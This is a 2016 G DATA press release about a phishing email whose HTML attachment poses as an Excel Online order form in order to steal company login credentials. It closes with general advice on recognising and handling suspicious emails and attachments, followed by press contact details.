Announcement of 22. March 2016

Order email turns out to be a phishing attack

Attackers are targeting company employees' login data.

The Locky ransomware case has not been the first time that attack attempts have been carried out via email. 54 billion spam messages are sent every day worldwide alone (source: Eleven). These involve not only mass attacks, but also highly targeted ones. In the current case we are dealing with a scam that tends to target companies. The procedure is new. Recipients of the email can only see that this is an attempt at fraud if they look very carefully. G DATA security solutions identify the attachment as Script.Trojan-Stealer.Phish.AG. The security experts at G DATA SecurityLabs have discussed the new scam in their latest blog entry.

The email that arrives in potential victims' inboxes is supposedly an order with an attachment called purchase-order.htm. But there are clues in the email that point to a scam. The company does not exist under the given name, the sender address is not real, and the text contains spelling mistakes. If the attackers gain access to an email account belonging to a private individual or a company, it can be used to send more spam. If access data belonging to a company gets out, far-reaching problems can arise, such as unauthorised access to internal company data and emails.

The file disguises itself as a type of Microsoft Excel Online Document. In the background, an Excel spreadsheet can be seen. However, this is just an image, not a spreadsheet that can be edited. The image is loaded from a server based in Hong Kong. Recipients are supposed to enter their login data into the form to start the download. After clicking on "Download", the email address and password they entered are sent to the same server in Hong Kong from which the images were downloaded – albeit to a different domain. This suggests that the entire server is being controlled by the attackers. After the data has been sent, a web page containing an error message is displayed.

 

For more information, see the G DATA SecurityBlog.

 

G DATA tips for dealing with such emails securely

  • Use a comprehensive security solution and keep it up to date!
  • Use email and spam protection to block tedious email.
  • Check emails for their plausibility. Ask yourself: Is there a reason why I/my company should receive this order from abroad? Am I the recipient of the email or is there a different address? What impression does the email make on me? Is the language OK or unusual in some way?
  • As a general rule, treat emails from unknown senders with suspicion! If an email looks very strange, here's what to do: ignore it, delete it, but under no circumstances open attachments or click on links.
  • Opening file attachments harbours risks. Attachments should first be scanned with a security solution and, if necessary, deleted without being opened. If you are uncertain, send the file to G DATA SecurityLabs for analysis without opening it.
  • Links in emails should never be clicked on without thinking. Check the URL. Many email programs show the actual target of the link when hovering the mouse over the visible link without actually clicking on it – the so-called mouse-over function. If you are uncertain, send the URL to G DATA SecurityLabs for analysis without clicking on it.
  • Emails with an HTML file attachment should be treated with great scepticism. The file format is only used for websites. It is very unusual to use it for exchanging information between individuals. The same applies to files in .js (JavaScript) format.
  • Never reply to spam email! All that a response does is indicate to the fraudsters that the address they wrote to is actually valid – and hence even more valuable to them.
  • Do not disclose any personal data – either via email or in dubious forms or on suspicious web pages!
  • In a corporate environment especially, it is worth speaking to your IT administrator or even the CISO if something looks suspicious to you!

Media:

Announcement of 22. March 2016

G DATA Software AG
G DATA Campus
Königsallee 178
D-44799 Bochum

Phone: +49 234 9762-239
E-Mail: presse@remove-this.gdata.de

Kathrin Beckert-Plewka
Public Relations Manager

Contact

Kathrin Beckert-Plewka

Phone: +49 234 9762-507
kathrin.beckert@remove-this.gdata.de

Vera Haake
Spokesperson for event & location communication

Contact

Vera Haake

Phone: +49 234 9762-376
vera.haake@remove-this.gdata.de

Stefan Karpenstein
Public Relations Manager

Contact

Stefan Karpenstein

Phone: +49 234 9762 - 517
stefan.karpenstein@remove-this.gdata.de